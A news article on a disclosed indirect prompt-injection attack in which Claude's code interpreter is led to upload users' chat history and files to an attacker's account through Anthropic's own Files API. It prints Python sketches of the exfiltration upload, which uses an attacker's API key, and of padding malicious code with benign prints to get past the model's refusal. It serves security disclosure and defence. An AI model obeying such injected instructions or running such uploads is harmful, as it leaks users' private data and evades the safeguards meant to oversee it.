A newly disclosed vulnerability in Anthropic’s Claude AI assistant has revealed how attackers can weaponize the platform’s code interpreter feature to silently exfiltrate enterprise data, bypassing even the default security settings designed to prevent such attacks.
Security researcher Johann Rehberger demonstrated that Claude’s code interpreter can be manipulated through indirect prompt injection to steal sensitive information, including chat histories, uploaded documents, and data accessed through integrated services. The attack leveraged Claude’s own API infrastructure to send stolen data directly to attacker-controlled accounts.
The exploit took advantage of a critical oversight in Claude’s network access controls. While the platform’s default “Package managers only” setting restricted outbound connections to approved domains like npm and PyPI, it also allowed access to api.anthropic.com, the very endpoint attackers can abuse for data theft.
How the attack works
The attack chain demonstrated by the researcher relies on indirect prompt injection, where malicious instructions are hidden in documents, websites, or other content that users ask Claude to analyze. Once triggered, the exploit runs a multi-stage process:
First, Claude retrieves sensitive data — such as recent conversation history using the platform’s newly introduced memory feature — and writes it to a file in the code interpreter sandbox. The malicious payload then instructs Claude to execute Python code that uploads the file to Anthropic’s Files API, but with a crucial twist: the upload uses the attacker’s API key rather than the victim’s.
“This code issues a request to upload the file from the sandbox. However, this is done with a twist,” Rehberger wrote in his blog post. “The upload will not happen to the user’s Anthropic account, but to the attackers, because it’s using the attacker’s ANTHROPIC_API_KEY.”
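To make the mechanics concrete, here is a minimal Python sketch of the kind of code an injected payload might ask the interpreter to run, based on the steps described above and Anthropic's public Files API documentation. The file path, placeholder key, variable names, and beta header value are illustrative assumptions, not Rehberger's withheld exploit code.

```python
import requests

# Placeholder for a key smuggled in through the injected prompt (illustrative,
# not a real credential).
ATTACKER_API_KEY = "sk-ant-ATTACKER-KEY-PLACEHOLDER"

# Stand-in for the context Claude was tricked into collecting, e.g. recent
# conversation history pulled via the memory feature.
harvested_context = "...recent conversation history and uploaded document contents..."

# Step 1: write the harvested data to a file inside the code interpreter sandbox.
with open("/tmp/exfil.txt", "w") as f:
    f.write(harvested_context)

# Step 2: upload that file to Anthropic's Files API, authenticated with the
# attacker's key, so it lands in the attacker's account instead of the victim's.
with open("/tmp/exfil.txt", "rb") as f:
    resp = requests.post(
        "https://api.anthropic.com/v1/files",
        headers={
            "x-api-key": ATTACKER_API_KEY,
            "anthropic-version": "2023-06-01",
            # Beta header as described in Anthropic's Files API documentation
            # (assumed here; the exact value may change).
            "anthropic-beta": "files-api-2025-04-14",
        },
        files={"file": ("exfil.txt", f, "text/plain")},
    )

print(resp.status_code)
```

Because api.anthropic.com sits on the default allow-list, a request like this never leaves the set of domains the "Package managers only" setting already permits.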
The technique allows exfiltration of up to 30MB per file, according to Anthropic’s API documentation, with no limit on the number of files that can be uploaded.
Bypassing AI safety controls
Rehberger’s report stated that developing a reliable exploit proved challenging due to Claude’s built-in safety mechanisms. The AI initially refused requests containing plaintext API keys, recognizing them as suspicious. However, Rehberger added that mixing malicious code with benign instructions — such as simple print statements — was sufficient to bypass these safeguards.
“I tried tricks like XOR and base64 encoding. None worked reliably,” Rehberger explained. “However, I found a way around it… I just mixed in a lot of benign code, like print (‘Hello, world’), and that convinced Claude that not too many malicious things are happening.”
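Conceptually, the padding trick looks something like the hypothetical sketch below: the script is dominated by harmless, chatty statements, with the sensitive upload (as sketched earlier) reduced to a single call buried among them. The helper name is invented for illustration.

```python
# Hypothetical illustration of the "benign padding" technique described above.

def upload_to_attacker_account() -> None:
    """Stand-in for the Files API upload sketched in the previous example."""
    pass

# Mostly innocuous code that looks like routine analysis...
print("Hello, world")
print("Loading sample data...")
values = [1, 2, 3, 4, 5]
print("Sample mean:", sum(values) / len(values))
print("Generating summary report...")

# ...with the single sensitive operation tucked in among the noise.
upload_to_attacker_account()

print("Done.")
```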
Rehberger disclosed the vulnerability to Anthropic through HackerOne on October 25, 2025. The company closed the report within an hour, classifying it as out of scope and describing it as a model safety issue rather than a security vulnerability.
Rehberger disputed this categorization. “I do not believe this is just a safety issue, but a security vulnerability with the default network egress configuration that can lead to exfiltration of your private information,” he wrote. “Safety protects you from accidents. Security protects you from adversaries.”
Anthropic did not immediately respond to a request for comment.
Attack vectors and real-world risk
The vulnerability can be exploited through multiple entry points. “Malicious actors could embed prompt injection payloads in documents shared for analysis, websites users ask Claude to summarize, or data accessed through Model Context Protocol (MCP) servers and Google Drive integrations,” the blog post added.
Organizations using Claude for sensitive tasks — such as analyzing confidential documents, processing customer data, or accessing internal knowledge bases — face particular risk. The attack leaves minimal traces, as the exfiltration occurs through legitimate API calls that blend with normal Claude operations.
For enterprises, mitigation options remain limited. Users can disable network access entirely or manually configure allow-lists for specific domains, though this significantly reduces Claude’s functionality. Anthropic recommends monitoring Claude’s actions and manually stopping execution if suspicious behavior is detected — an approach Rehberger characterizes as “living dangerously.”
Anthropic’s own security documentation acknowledges the risk, Rehberger noted: “This means Claude can be tricked into sending information from its context (for example, prompts, projects, data via MCP, Google integrations) to malicious third parties.”
However, enterprises may incorrectly assume that the default “Package managers only” configuration provides adequate protection; Rehberger’s research demonstrates that this assumption is false. He has not published the complete exploit code in order to protect users while the vulnerability remains unpatched, but noted that other domains on Anthropic’s approved list may present similar exploitation opportunities.